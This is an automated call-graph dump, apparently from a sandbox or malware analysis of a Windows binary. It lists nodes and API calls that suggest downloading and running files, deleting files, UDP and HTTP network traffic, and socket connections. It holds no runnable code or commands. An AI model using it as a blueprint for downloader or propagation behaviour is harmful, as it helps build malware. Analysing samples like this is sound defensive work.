40cb60 4579->4584 4618 40c9e0 4580->4618 4582->4443 4582->4444 4585 40cb89 4584->4585 4586 40cc3a 4584->4586 4617 40cc32 4585->4617 4644 40a320 4585->4644 4589 40a320 7 API calls 4586->4589 4586->4617 4590 40cc5e 4589->4590 4593 402420 7 API calls 4590->4593 4590->4617 4595 40cc82 4593->4595 4594 40a320 7 API calls 4596 40cbd2 4594->4596 4597 40a320 7 API calls 4595->4597 4652 4024e0 4596->4652 4599 40cc91 4597->4599 4601 4024e0 10 API calls 4599->4601 4600 40cbfb 4655 40a740 4600->4655 4603 40ccba 4601->4603 4605 40a740 _invalid_parameter 3 API calls 4603->4605 4607 40ccc6 4605->4607 4606 402420 7 API calls 4608 40cc18 4606->4608 4609 402420 7 API calls 4607->4609 4610 4024e0 10 API calls 4608->4610 4611 40ccd7 4609->4611 4610->4617 4612 4024e0 10 API calls 4611->4612 4613 40ccf1 4612->4613 4614 402420 7 API calls 4613->4614 4615 40cd02 4614->4615 4616 4024e0 10 API calls 4615->4616 4616->4617 4617->4582 4620 40ca92 4618->4620 4621 40ca09 4618->4621 4619 40ca8a 4619->4582 4620->4619 4623 40a320 7 API calls 4620->4623 4621->4619 4622 40a320 7 API calls 4621->4622 4624 40ca1c 4622->4624 4625 40cab8 4623->4625 4624->4619 4626 402420 7 API calls 4624->4626 4625->4619 4627 402420 7 API calls 4625->4627 4628 40ca45 4626->4628 4629 40cae5 4627->4629 4630 4024e0 10 API calls 4628->4630 4631 4024e0 10 API calls 4629->4631 4632 40ca5f 4630->4632 4633 40caff 4631->4633 4634 402420 7 API calls 4632->4634 4635 402420 7 API calls 4633->4635 4636 40ca70 4634->4636 4637 40cb10 4635->4637 4638 4024e0 10 API calls 4636->4638 4639 4024e0 10 API calls 4637->4639 4638->4619 4640 40cb2a 4639->4640 4641 402420 7 API calls 4640->4641 4642 40cb3b 4641->4642 4643 4024e0 10 API calls 4642->4643 4643->4619 4662 40a340 4644->4662 4647 402420 4683 40a530 4647->4683 4690 402540 4652->4690 4654 4024ff __aligned_recalloc_base 4654->4600 4700 40a3e0 GetCurrentProcessId 4655->4700 4657 40a74b 4658 40a752 4657->4658 4701 40a680 4657->4701 4658->4606 4661 40a767 HeapFree 4661->4658 4671 40a3e0 GetCurrentProcessId 4662->4671 4664 40a34b 4667 40a357 __aligned_recalloc_base 4664->4667 4672 40a400 4664->4672 4666 40a32e 4666->4617 4666->4647 4667->4666 4668 40a372 RtlAllocateHeap 4667->4668 4668->4666 4669 40a399 __aligned_recalloc_base 4668->4669 4669->4666 4670 40a3b4 memset 4669->4670 4670->4666 4671->4664 4680 40a3e0 GetCurrentProcessId 4672->4680 4674 40a409 4675 40a426 HeapCreate 4674->4675 4681 40a470 GetProcessHeaps 4674->4681 4677 40a440 HeapSetInformation GetCurrentProcessId 4675->4677 4678 40a467 4675->4678 4677->4678 4678->4667 4680->4674 4682 40a41c 4681->4682 4682->4675 4682->4678 4684 40a340 __aligned_recalloc_base 7 API calls 4683->4684 4685 40242b 4684->4685 4686 402820 4685->4686 4687 40282a 4686->4687 4688 40a530 __aligned_recalloc_base 7 API calls 4687->4688 4689 402438 4688->4689 4689->4594 4691 40258e 4690->4691 4692 402551 4690->4692 4691->4692 4693 40a530 __aligned_recalloc_base 7 API calls 4691->4693 4692->4654 4696 4025b2 _invalid_parameter 4693->4696 4694 4025e2 memcpy 4695 402606 _invalid_parameter 4694->4695 4697 40a740 _invalid_parameter 3 API calls 4695->4697 4696->4694 4698 40a740 _invalid_parameter 3 API calls 4696->4698 4697->4692 4699 4025df 4698->4699 4699->4694 4700->4657 4702 40a6b0 HeapValidate 4701->4702 4703 40a6d0 4701->4703 4702->4703 4703->4658 4703->4661 4721 40a7b0 4704->4721 4707 40cdf1 4707->4482 4710 40a740 _invalid_parameter 3 API calls 4710->4707 4934 40a570 4711->4934 4714 405cca memcpy 4716 40a7b0 8 API calls 4714->4716 4715 405d88 4715->4482 4717 405d01 4716->4717 4944 40c720 4717->4944 4722 40a7dd 4721->4722 4723 40a530 __aligned_recalloc_base 7 API calls 4722->4723 4724 40a7f2 4722->4724 4725 40a7f4 memcpy 4722->4725 4723->4722 4724->4707 4726 40c2c0 4724->4726 4725->4722 4729 40c2ca 4726->4729 4730 40c301 memcmp 4729->4730 4731 40c328 4729->4731 4732 40a740 _invalid_parameter 3 API calls 4729->4732 4734 40c2e9 4729->4734 4735 40c7b0 4729->4735 4749 408080 4729->4749 4730->4729 4733 40a740 _invalid_parameter 3 API calls 4731->4733 4732->4729 4733->4734 4734->4707 4734->4710 4736 40c7bf __aligned_recalloc_base 4735->4736 4737 40a530 __aligned_recalloc_base 7 API calls 4736->4737 4739 40c7c9 4736->4739 4738 40c858 4737->4738 4738->4739 4740 402420 7 API calls 4738->4740 4739->4729 4741 40c86d 4740->4741 4742 402420 7 API calls 4741->4742 4743 40c875 4742->4743 4745 40c8cd __aligned_recalloc_base 4743->4745 4752 40c920 4743->4752 4757 402470 4745->4757 4748 402470 3 API calls 4748->4739 4865 40a2a0 4749->4865 4753 4024e0 10 API calls 4752->4753 4754 40c934 4753->4754 4763 4026f0 4754->4763 4756 40c94c 4756->4743 4758 402484 _invalid_parameter 4757->4758 4760 4024ce 4757->4760 4761 40a740 _invalid_parameter 3 API calls 4758->4761 4762 4024ac 4758->4762 4759 40a740 _invalid_parameter 3 API calls 4759->4760 4760->4748 4761->4762 4762->4759 4766 402710 4763->4766 4765 40270a 4765->4756 4767 402724 4766->4767 4768 402540 __aligned_recalloc_base 10 API calls 4767->4768 4769 40276d 4768->4769 4770 402540 __aligned_recalloc_base 10 API calls 4769->4770 4771 40277d 4770->4771 4772 402540 __aligned_recalloc_base 10 API calls 4771->4772 4773 40278d 4772->4773 4774 402540 __aligned_recalloc_base 10 API calls 4773->4774 4775 40279d 4774->4775 4776 4027a6 4775->4776 4777 4027cf 4775->4777 4781 403e20 4776->4781 4798 403df0 4777->4798 4780 4027c7 __aligned_recalloc_base 4780->4765 4782 402820 _invalid_parameter 7 API calls 4781->4782 4783 403e37 4782->4783 4784 402820 _invalid_parameter 7 API calls 4783->4784 4785 403e46 4784->4785 4786 402820 _invalid_parameter 7 API calls 4785->4786 4787 403e55 4786->4787 4788 402820 _invalid_parameter 7 API calls 4787->4788 4797 403e64 _invalid_parameter __aligned_recalloc_base 4788->4797 4790 40400f _invalid_parameter 4791 402850 _invalid_parameter 3 API calls 4790->4791 4792 404035 _invalid_parameter 4790->4792 4791->4790 4793 402850 _invalid_parameter 3 API calls 4792->4793 4794 40405b _invalid_parameter 4792->4794 4793->4792 4795 402850 _invalid_parameter 3 API calls 4794->4795 4796 404081 4794->4796 4795->4794 4796->4780 4797->4790 4801 402850 4797->4801 4805 404090 4798->4805 4800 403e0c 4800->4780 4802 402866 4801->4802 4803 40285b 4801->4803 4802->4797 4804 40a740 _invalid_parameter 3 API calls 4803->4804 4804->4802 4806 4040a6 _invalid_parameter 4805->4806 4807 4040b8 _invalid_parameter 4806->4807 4808 4040dd 4806->4808 4810 404103 4806->4810 4807->4800 4835 403ca0 4808->4835 4811 40413d 4810->4811 4812 40415e 4810->4812 4845 404680 4811->4845 4814 402820 _invalid_parameter 7 API calls 4812->4814 4815 40416f 4814->4815 4816 402820 _invalid_parameter 7 API calls 4815->4816 4817 40417e 4816->4817 4818 402820 _invalid_parameter 7 API calls 4817->4818 4819 40418d 4818->4819 4820 402820 _invalid_parameter 7 API calls 4819->4820 4821 40419c 4820->4821 4858 403d70 4821->4858 4823 402820 _invalid_parameter 7 API calls 4824 4041ca _invalid_parameter 4823->4824 4824->4823 4826 404284 _invalid_parameter __aligned_recalloc_base 4824->4826 4825 402850 _invalid_parameter 3 API calls 4825->4826 4826->4825 4827 4045a3 _invalid_parameter 4826->4827 4828 402850 _invalid_parameter 3 API calls 4827->4828 4829 4045c9 _invalid_parameter 4827->4829 4828->4827 4830 402850 _invalid_parameter 3 API calls 4829->4830 4831 4045ef _invalid_parameter 4829->4831 4830->4829 4832 402850 _invalid_parameter 3 API calls 4831->4832 4833 404615 _invalid_parameter 4831->4833 4832->4831 4833->4807 4834 402850 _invalid_parameter 3 API calls 4833->4834 4834->4833 4836 403cae 4835->4836 4837 402820 _invalid_parameter 7 API calls 4836->4837 4838 403ccb 4837->4838 4839 402820 _invalid_parameter 7 API calls 4838->4839 4840 403cda _invalid_parameter 4839->4840 4841 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4840->4841 4842 403d3a _invalid_parameter 4840->4842 4841->4840 4843 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4842->4843 4844 403d60 4842->4844 4843->4842 4844->4807 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 404697 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 4046a6 4848->4849 4850 402820 _invalid_parameter 7 API calls 4849->4850 4857 4046b5 _invalid_parameter __aligned_recalloc_base 4850->4857 4851 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4851->4857 4852 404841 _invalid_parameter 4853 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4852->4853 4854 404867 _invalid_parameter 4852->4854 4853->4852 4855 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4854->4855 4856 40488d 4854->4856 4855->4854 4856->4807 4857->4851 4857->4852 4859 402820 _invalid_parameter 7 API calls 4858->4859 4860 403d7f _invalid_parameter 4859->4860 4861 403ca0 _invalid_parameter 9 API calls 4860->4861 4862 403db8 _invalid_parameter 4861->4862 4863 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4862->4863 4864 403de3 4862->4864 4863->4862 4864->4824 4866 40a2b2 4865->4866 4869 40a200 4866->4869 4870 40a530 __aligned_recalloc_base 7 API calls 4869->4870 4872 40a210 4870->4872 4875 40a24c 4872->4875 4876 40809f 4872->4876 4878 409730 4872->4878 4885 409d20 4872->4885 4890 40a0f0 4872->4890 4874 40a740 _invalid_parameter 3 API calls 4874->4876 4875->4874 4876->4729 4879 409743 4878->4879 4880 409739 4878->4880 4879->4880 4881 409786 memset 4879->4881 4880->4872 4881->4880 4882 4097a7 4881->4882 4882->4880 4883 4097ad memcpy 4882->4883 4898 409500 4883->4898 4886 409d37 4885->4886 4889 409d2d 4885->4889 4887 409e2f memcpy 4886->4887 4886->4889 4903 409a50 4886->4903 4887->4886 4889->4872 4891 40a106 4890->4891 4896 40a0fc 4890->4896 4892 409a50 64 API calls 4891->4892 4891->4896 4893 40a187 4892->4893 4894 409500 6 API calls 4893->4894 4893->4896 4895 40a1a6 4894->4895 4895->4896 4897 40a1bb memcpy 4895->4897 4896->4872 4897->4896 4899 40954e 4898->4899 4901 40950e 4898->4901 4899->4880 4901->4899 4902 409440 6 API calls 4901->4902 4902->4901 4904 409a60 4903->4904 4905 409a6a 4903->4905 4904->4886 4905->4904 4913 409890 4905->4913 4908 409ba8 memcpy 4908->4904 4910 409bc7 memcpy 4911 409cf1 4910->4911 4912 409a50 62 API calls 4911->4912 4912->4904 4914 40989d 4913->4914 4915 4098a7 4913->4915 4914->4904 4914->4908 4914->4910 4915->4914 4917 409935 4915->4917 4918 409918 4915->4918 4923 409930 4915->4923 4919 409500 6 API calls 4917->4919 4921 409500 6 API calls 4918->4921 4919->4923 4921->4923 4922 4099dc memset 4922->4914 4924 4091f0 4923->4924 4925 409209 4924->4925 4933 4091ff 4924->4933 4926 4090c0 9 API calls 4925->4926 4925->4933 4927 409302 4926->4927 4928 40a530 __aligned_recalloc_base 7 API calls 4927->4928 4929 409351 4928->4929 4930 408f30 46 API calls 4929->4930 4929->4933 4931 40937e 4930->4931 4932 40a740 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4931->4932 4932->4933 4933->4914 4933->4922 4953 40a3e0 GetCurrentProcessId 4934->4953 4936 40a57b 4937 40a400 __aligned_recalloc_base 5 API calls 4936->4937 4942 40a587 __aligned_recalloc_base 4936->4942 4937->4942 4938 405cb5 4938->4714 4938->4715 4939 40a680 _invalid_parameter HeapValidate 4939->4942 4940 40a630 HeapAlloc 4940->4942 4941 40a5fa HeapReAlloc 4941->4942 4942->4938 4942->4939 4942->4940 4942->4941 4943 40a740 _invalid_parameter 3 API calls 4942->4943 4943->4942 4947 40c72b 4944->4947 4945 40a530 __aligned_recalloc_base 7 API calls 4945->4947 4946 405d4d 4946->4715 4948 4072a0 4946->4948 4947->4945 4947->4946 4949 40a530 __aligned_recalloc_base 7 API calls 4948->4949 4950 4072b0 4949->4950 4951 4072f7 4950->4951 4952 4072bc memcpy CreateThread CloseHandle 4950->4952 4951->4715 4952->4951 4954 407300 4952->4954 4953->4936 4955 407371 4954->4955 4956 407311 4954->4956 4957 40737c DeleteUrlCacheEntry 4955->4957 4961 40736f 4955->4961 4960 407320 StrChrA 4956->4960 4956->4961 4963 407344 DeleteUrlCacheEntry 4956->4963 4958 40f070 64 API calls 4957->4958 4958->4961 4959 40a740 _invalid_parameter 3 API calls 4962 4073a6 4959->4962 4960->4956 4960->4963 4961->4959 4966 40f070 9 API calls 4963->4966 4967 40f133 InternetOpenUrlW 4966->4967 4968 40f29e InternetCloseHandle Sleep 4966->4968 4969 40f291 InternetCloseHandle 4967->4969 4970 40f162 CreateFileW 4967->4970 4971 40f2c5 7 API calls 4968->4971 4972 407359 Sleep 4968->4972 4969->4968 4973 40f191 InternetReadFile 4970->4973 4974 40f284 CloseHandle 4970->4974 4971->4972 4975 40f354 wsprintfW DeleteFileW Sleep 4971->4975 4972->4956 4976 40f1e4 CloseHandle wsprintfW DeleteFileW Sleep 4973->4976 4977 40f1b5 4973->4977 4974->4969 4978 40ed50 21 API calls 4975->4978 4996 40ed50 CreateFileW 4976->4996 4977->4976 4979 40f1be WriteFile 4977->4979 4981 40f394 4978->4981 4979->4973 4983 40f3d2 DeleteFileW 4981->4983 4984 40f39e Sleep 4981->4984 4983->4972 4987 40ef10 6 API calls 4984->4987 4985 40f277 DeleteFileW 4985->4974 4986 40f23b Sleep 4988 40ef10 6 API calls 4986->4988 4991 40f3b5 4987->4991 4989 40f252 4988->4989 4992 40f26e 4989->4992 4993 40f25d 4989->4993 4990 40f3d0 4990->4972 4991->4990 4994 40f3c8 ExitProcess 4991->4994 4992->4974 4993->4992 4995 40f266 ExitProcess 4993->4995 4997 40ed95 CreateFileMappingW 4996->4997 4998 40eeaa 4996->4998 4999 40eea0 CloseHandle 4997->4999 5000 40edb6 MapViewOfFile 4997->5000 5001 40eeb0 CreateFileW 4998->5001 5010 40ef01 4998->5010 4999->4998 5002 40edd5 GetFileSize 5000->5002 5003 40ee96 CloseHandle 5000->5003 5004 40eed2 WriteFile CloseHandle 5001->5004 5005 40eef8 5001->5005 5006 40edf1 5002->5006 5007 40ee8c UnmapViewOfFile 5002->5007 5003->4999 5004->5005 5008 40a740 _invalid_parameter 3 API calls 5005->5008 5018 40cd80 5006->5018 5007->5003 5008->5010 5010->4985 5010->4986 5012 40c720 7 API calls 5013 40ee40 5012->5013 5013->5007 5014 40ee5d memcmp 5013->5014 5014->5007 5015 40ee79 5014->5015 5016 40a740 _invalid_parameter 3 API calls 5015->5016 5017 40ee82 5016->5017 5017->5007 5019 40c7b0 10 API calls 5018->5019 5020 40cda4 5019->5020 5020->5007 5020->5012 5022 40ddfe 5021->5022 5023 40dccd htons inet_addr setsockopt 5021->5023 5022->4492 5024 40b010 8 API calls 5023->5024 5025 40dd46 bind lstrlenA sendto ioctlsocket 5024->5025 5029 40dd9b 5025->5029 5026 40ddc2 5078 40b0d0 shutdown closesocket 5026->5078 5029->5026 5030 40a570 9 API calls 5029->5030 5069 40de20 5029->5069 5030->5029 5085 40e150 memset InternetCrackUrlA InternetOpenA 5031->5085 5034 40e02e 5034->4492 5036 40a740 _invalid_parameter 3 API calls 5036->5034 5040 40dffb 5040->5036 5043 40dff1 SysFreeString 5043->5040 5192 40afd0 inet_addr 5046->5192 5049 40b0bd 5054 40ea00 5049->5054 5050 40b06c connect 5051 40b080 getsockname 5050->5051 5052 40b0b4 5050->5052 5051->5052 5195 40b0d0 shutdown closesocket 5052->5195 5196 40afb0 inet_ntoa 5054->5196 5056 40ea16 5057 40cf80 11 API calls 5056->5057 5058 40ea35 5057->5058 5064 40dc5c 5058->5064 5197 40ea80 memset InternetCrackUrlA InternetOpenA 5058->5197 5061 40a740 _invalid_parameter 3 API calls 5063 40ea6c 5061->5063 5062 40a740 _invalid_parameter 3 API calls 5062->5064 5063->5062 5064->4497 5068 40a864 5065->5068 5066 40a86a 5066->4488 5067 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5067->5068 5068->5066 5068->5067 5074 40de3c 5069->5074 5070 40df04 5070->5029 5071 40de58 recvfrom 5072 40de86 StrCmpNIA 5071->5072 5073 40de79 Sleep 5071->5073 5072->5074 5075 40dea5 StrStrIA 5072->5075 5073->5074 5074->5070 5074->5071 5075->5074 5076 40dec6 StrChrA 5075->5076 5079 40ce30 5076->5079 5078->5022 5080 40ce3b 5079->5080 5081 40ce41 lstrlenA 5080->5081 5082 40ce54 5080->5082 5083 40a530 __aligned_recalloc_base 7 API calls 5080->5083 5084 40ce70 memcpy 5080->5084 5081->5080 5081->5082 5082->5074 5083->5080 5084->5080 5084->5082 5086 40e1f1 InternetConnectA 5085->5086 5087 40df2a 5085->5087 5088 40e35a InternetCloseHandle 5086->5088 5089 40e22a HttpOpenRequestA 5086->5089 5087->5034 5098 40e040 5087->5098 5088->5087 5090 40e260 HttpSendRequestA 5089->5090 5091 40e34d InternetCloseHandle 5089->5091 5092 40e340 InternetCloseHandle 5090->5092 5093 40e27d 5090->5093 5091->5088 5092->5091 5094 40e2cb 5093->5094 5095 40e29e InternetReadFile 5093->5095 5096 40a570 9 API calls 5093->5096 5094->5092 5095->5093 5095->5094 5097 40e2e6 memcpy 5096->5097 5097->5093 5127 405630 5098->5127 5101 40df43 5101->5040 5108 40e9b0 5101->5108 5102 40e06a SysAllocString 5103 40e081 CoCreateInstance 5102->5103 5104 40e137 5102->5104 5105 40e12d SysFreeString 5103->5105 5107 40e0a6 5103->5107 5106 40a740 _invalid_parameter 3 API calls 5104->5106 5105->5104 5106->5101 5107->5105 5144 40e500 5108->5144 5111 40e380 5149 40e7d0 5111->5149 5116 40e930 6 API calls 5117 40e3d7 5116->5117 5123 40dfc2 5117->5123 5166 40e5f0 5117->5166 5120 40e40f 5120->5123 5171 40e4a0 5120->5171 5121 40e5f0 6 API calls 5121->5120 5123->5043 5124 40cf80 5123->5124 5187 40cef0 5124->5187 5132 40563d 5127->5132 5128 405643 lstrlenA 5130 405656 5128->5130 5128->5132 5130->5101 5130->5102 5131 40a530 __aligned_recalloc_base 7 API calls 5131->5132 5132->5128 5132->5130 5132->5131 5134 40a740 _invalid_parameter 3 API calls 5132->5134 5135 4055d0 5132->5135 5139 405580 5132->5139 5134->5132 5136 4055e7 MultiByteToWideChar 5135->5136 5137 4055da lstrlenA 5135->5137 5138 40560c 5136->5138 5137->5136 5138->5132 5140 40558b 5139->5140 5141 405591 lstrlenA 5140->5141 5142 4055d0 2 API calls 5140->5142 5143 4055c7 5140->5143 5141->5140 5142->5140 5143->5132 5147 40e526 5144->5147 5145 40dfad 5145->5040 5145->5111 5146 40e5a3 lstrcmpiW 5146->5147 5148 40e5bb SysFreeString 5146->5148 5147->5145 5147->5146 5147->5148 5148->5147 5151 40e7f6 5149->5151 5150 40e39b 5150->5123 5161 40e930 5150->5161 5151->5150 5152 40e883 lstrcmpiW 5151->5152 5153 40e903 SysFreeString 5152->5153 5154 40e896 5152->5154 5153->5150 5155 40e4a0 2 API calls 5154->5155 5157 40e8a4 5155->5157 5156 40e8f5 5156->5153 5157->5153 5157->5156 5158 40e8d3 lstrcmpiW 5157->5158 5159 40e8e5 5158->5159 5160 40e8eb SysFreeString 5158->5160 5159->5160 5160->5156 5162 40e4a0 2 API calls 5161->5162 5164 40e94b 5162->5164 5163 40e3b9 5163->5116 5163->5123 5164->5163 5165 40e7d0 6 API calls 5164->5165 5165->5163 5167 40e4a0 2 API calls 5166->5167 5168 40e60b 5167->5168 5170 40e3f5 5168->5170 5175 40e670 5168->5175 5170->5120 5170->5121 5172 40e4c6 5171->5172 5173 40e4dd 5172->5173 5174 40e500 2 API calls 5172->5174 5173->5123 5174->5173 5176 40e696 5175->5176 5177 40e7ad 5176->5177 5178 40e723 lstrcmpiW 5176->5178 5177->5170 5179 40e7a3 SysFreeString 5178->5179 5180 40e736 5178->5180 5179->5177 5181 40e4a0 2 API calls 5180->5181 5183 40e744 5181->5183 5182 40e795 5182->5179 5183->5179 5183->5182 5184 40e773 lstrcmpiW 5183->5184 5185 40e785 5184->5185 5186 40e78b SysFreeString 5184->5186 5185->5186 5186->5182 5191 40cefd 5187->5191 5188 40cea0 _vscprintf wvsprintfA 5188->5191 5189 40cf18 SysFreeString 5189->5043 5190 40a570 9 API calls 5190->5191 5191->5188 5191->5189 5191->5190 5193 40affc socket 5192->5193 5194 40afe9 gethostbyname 5192->5194 5193->5049 5193->5050 5194->5193 5195->5049 5196->5056 5198 40ea57 5197->5198 5199 40eb24 InternetConnectA 5197->5199 5198->5061 5198->5063 5200 40eca4 InternetCloseHandle 5199->5200 5201 40eb5d HttpOpenRequestA 5199->5201 5200->5198 5202 40eb93 HttpAddRequestHeadersA HttpSendRequestA 5201->5202 5203 40ec97 InternetCloseHandle 5201->5203 5204 40ec8a InternetCloseHandle 5202->5204 5207 40ebdd 5202->5207 5203->5200 5204->5203 5205 40ebf4 InternetReadFile 5206 40ec21 5205->5206 5205->5207 5206->5204 5207->5205 5207->5206 5208 40a570 9 API calls 5207->5208 5209 40ec3c memcpy 5208->5209 5209->5207 5216 406ff7 5210->5216 5211 407250 CoCreateInstance 5211->5216 5212 4071cb 5214 4071d4 SysFreeString 5212->5214 5215 406f9b SysFreeString 5212->5215 5213 40a740 _invalid_parameter 3 API calls 5213->5212 5214->5215 5215->4501 5216->5211 5217 407146 SysAllocString 5216->5217 5218 407012 5216->5218 5217->5216 5217->5218 5218->5212 5218->5213 5220 40c45a 5219->5220 5221 40c45e 5219->5221 5220->4507 5223 40c410 CryptAcquireContextW 5221->5223 5224 40c44b 5223->5224 5225 40c42d CryptGenRandom CryptReleaseContext 5223->5225 5224->5220 5225->5224 5226->4523 5278 40b360 gethostname 5227->5278 5230 40b449 5230->4523 5232 40b45c strcmp 5232->5230 5233 40b471 5232->5233 5282 40afb0 inet_ntoa 5233->5282 5235 40b47f strstr 5236 40b4d0 5235->5236 5237 40b48f 5235->5237 5283 40afb0 inet_ntoa 5236->5283 5285 40afb0 inet_ntoa 5237->5285 5240 40b49d strstr 5240->5230 5244 40b4ad 5240->5244 5241 40b4de strstr 5242 40b4ee 5241->5242 5243 40b52f 5241->5243 5287 40afb0 inet_ntoa 5242->5287 5284 40afb0 inet_ntoa 5243->5284 5286 40afb0 inet_ntoa 5244->5286 5248 40b4fc strstr 5248->5230 5251 40b50c 5248->5251 5249 40b53d strstr 5252 40b54d 5249->5252 5253 40b58e EnterCriticalSection 5249->5253 5250 40b4bb strstr 5250->5230 5250->5236 5288 40afb0 inet_ntoa 5251->5288 5289 40afb0 inet_ntoa 5252->5289 5258 40b5a6 5253->5258 5256 40b51a strstr 5256->5230 5256->5243 5257 40b55b strstr 5257->5230 5259 40b56b 5257->5259 5262 40b5d1 5258->5262 5291 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5258->5291 5290 40afb0 inet_ntoa 5259->5290 5263 40b6ca LeaveCriticalSection 5262->5263 5265 40a320 7 API calls 5262->5265 5263->5230 5264 40b579 strstr 5264->5230 5264->5253 5266 40b615 5265->5266 5266->5263 5292 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5266->5292 5268 40b633 5269 40b660 5268->5269 5270 40b656 Sleep 5268->5270 5272 40b685 5268->5272 5271 40a740 _invalid_parameter 3 API calls 5269->5271 5270->5268 5271->5272 5272->5263 5293 40b110 5272->5293 5275 40b110 14 API calls 5274->5275 5276 40b103 LeaveCriticalSection 5275->5276 5276->4530 5277->4535 5279 40b387 gethostbyname 5278->5279 5280 40b3a3 5278->5280 5279->5280 5280->5230 5281 40afb0 inet_ntoa 5280->5281 5281->5232 5282->5235 5283->5241 5284->5249 5285->5240 5286->5250 5287->5248 5288->5256 5289->5257 5290->5264 5291->5262 5292->5268 5294 40b124 5293->5294 5301 40b11f 5293->5301 5295 40a530 __aligned_recalloc_base 7 API calls 5294->5295 5296 40b138 5295->5296 5297 40b194 CreateFileW 5296->5297 5296->5301 5298 40b1e3 InterlockedExchange 5297->5298 5299 40b1b7 WriteFile FlushFileBuffers CloseHandle 5297->5299 5300 40a740 _invalid_parameter 3 API calls 5298->5300 5299->5298 5300->5301 5301->5263 5305 40d7ed 5302->5305 5303 40d723 5303->4542 5303->4543 5304 40d811 WaitForSingleObject 5304->5305 5306 40d82c CloseHandle 5304->5306 5305->5303 5305->5304 5306->5305 5308 40d444 5307->5308 5310 40d460 WaitForSingleObject 5308->5310 5311 40d485 5308->5311 5374 40b790 EnterCriticalSection 5308->5374 5379 40d060 InterlockedExchangeAdd 5308->5379 5310->5308 5310->5311 5314 401f92 5313->5314 5319 402008 5313->5319 5315 401f97 WSAGetOverlappedResult 5314->5315 5562 401d60 5314->5562 5315->5314 5316 401fb9 WSAGetLastError 5315->5316 5316->5314 5318 401fd3 GetQueuedCompletionStatus 5318->5314 5318->5319 5603 4013b0 5320->5603 5322 40db70 5323 40b790 5 API calls 5324 40daed 5323->5324 5324->5322 5324->5323 5325 40db07 InterlockedExchangeAdd 5324->5325 5326 40db4b WaitForSingleObject 5324->5326 5329 40bab0 18 API calls 5324->5329 5325->5324 5325->5326 5326->5324 5327 40db64 5326->5327 5616 401330 5327->5616 5329->5324 5656 401470 5331->5656 5333 40db94 5334 40dbc2 5333->5334 5335 40dba5 WaitForSingleObject 5333->5335 5336 401330 8 API calls 5335->5336 5337 40dbbf 5336->5337 5337->5334 5671 4021b0 5338->5671 5341 40d4d2 5342 40d4b5 WaitForSingleObject 5675 401600 5342->5675 5346 401ac9 5345->5346 5347 40194d WSAWaitForMultipleEvents 5345->5347 5348 4019f0 GetTickCount 5347->5348 5349 40196a WSAEnumNetworkEvents 5347->5349 5350 401a43 GetTickCount 5348->5350 5351 401a05 EnterCriticalSection 5348->5351 5349->5348 5364 401983 5349->5364 5352 401ab5 WaitForSingleObject 5350->5352 5353 401a4e EnterCriticalSection 5350->5353 5354 401a16 5351->5354 5355 401a3a LeaveCriticalSection 5351->5355 5352->5346 5352->5347 5356 401aa1 LeaveCriticalSection GetTickCount 5353->5356 5357 401a5f InterlockedExchangeAdd 5353->5357 5360 401a29 LeaveCriticalSection 5354->5360 5739 401820 5354->5739 5355->5352 5356->5352 5757 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5357->5757 5358 401992 accept 5358->5348 5358->5364 5360->5352 5363 401a72 5363->5356 5363->5357 5758 40b0d0 shutdown closesocket 5363->5758 5364->5348 5364->5358 5366 4019e9 5364->5366 5719 4022c0 5364->5719 5367 401cf0 7 API calls 5366->5367 5367->5348 5369 40b9b3 WaitForSingleObject 5368->5369 5370 40b9e1 5369->5370 5371 40b9cb InterlockedDecrement 5369->5371 5372 40b9da 5371->5372 5372->5369 5373 40b0f0 16 API calls 5372->5373 5373->5372 5375 40b7c7 LeaveCriticalSection 5374->5375 5376 40b7af 5374->5376 5375->5308 5377 40c450 3 API calls 5376->5377 5378 40b7ba 5377->5378 5378->5375 5380 40d07d 5379->5380 5390 40d076 5379->5390 5396 40d350 5380->5396 5383 40d09d InterlockedIncrement 5393 40d0a7 5383->5393 5385 40d0d0 5407 40afb0 inet_ntoa 5385->5407 5387 40d0dc 5388 40d1a0 InterlockedDecrement 5387->5388 5406 40b0d0 shutdown closesocket 5388->5406 5390->5308 5391 40a530 __aligned_recalloc_base 7 API calls 5391->5393 5392 40d280 6 API calls 5392->5393 5393->5385 5393->5388 5393->5391 5393->5392 5395 40a740 _invalid_parameter 3 API calls 5393->5395 5403 40bab0 5393->5403 5408 40bb00 5393->5408 5395->5393 5397 40d35d socket 5396->5397 5398 40d372 htons connect 5397->5398 5399 40d3cf 5397->5399 5398->5399 5400 40d3ba 5398->5400 5399->5397 5402 40d08d 5399->5402 5422 40b0d0 shutdown closesocket 5400->5422 5402->5383 5402->5390 5423 40ba10 5403->5423 5406->5390 5407->5387 5419 40bb11 5408->5419 5411 40a740 _invalid_parameter 3 API calls 5412 40bedf 5411->5412 5412->5393 5413 40bb2f 5413->5411 5414 40bef0 26 API calls 5414->5419 5417 40bab0 18 API calls 5417->5419 5418 40b410 32 API calls 5418->5419 5419->5413 5419->5414 5419->5417 5419->5418 5462 40c040 5419->5462 5469 40b7e0 EnterCriticalSection 5419->5469 5474 406e20 5419->5474 5479 406ec0 5419->5479 5484 406cf0 5419->5484 5491 406df0 5419->5491 5422->5402 5424 40c490 3 API calls 5423->5424 5425 40ba1b 5424->5425 5426 40ba37 lstrlenA 5425->5426 5427 40c720 7 API calls 5426->5427 5428 40ba6d 5427->5428 5429 40ba98 5428->5429 5434 40dab0 5428->5434 5437 40d1c0 5428->5437 5429->5393 5430 40ba8c 5431 40a740 _invalid_parameter 3 API calls 5430->5431 5431->5429 5442 401200 5434->5442 5436 40dad2 5436->5430 5458 40d220 5437->5458 5440 40d220 send 5441 40d1ee 5440->5441 5441->5430 5443 40121d 5442->5443 5456 401314 5442->5456 5444 40a530 __aligned_recalloc_base 7 API calls 5443->5444 5443->5456 5445 401247 memcpy htons 5444->5445 5446 401297 sendto 5445->5446 5452 4012ed 5445->5452 5447 4012b6 InterlockedExchangeAdd 5446->5447 5448 4012e9 5446->5448 5447->5446 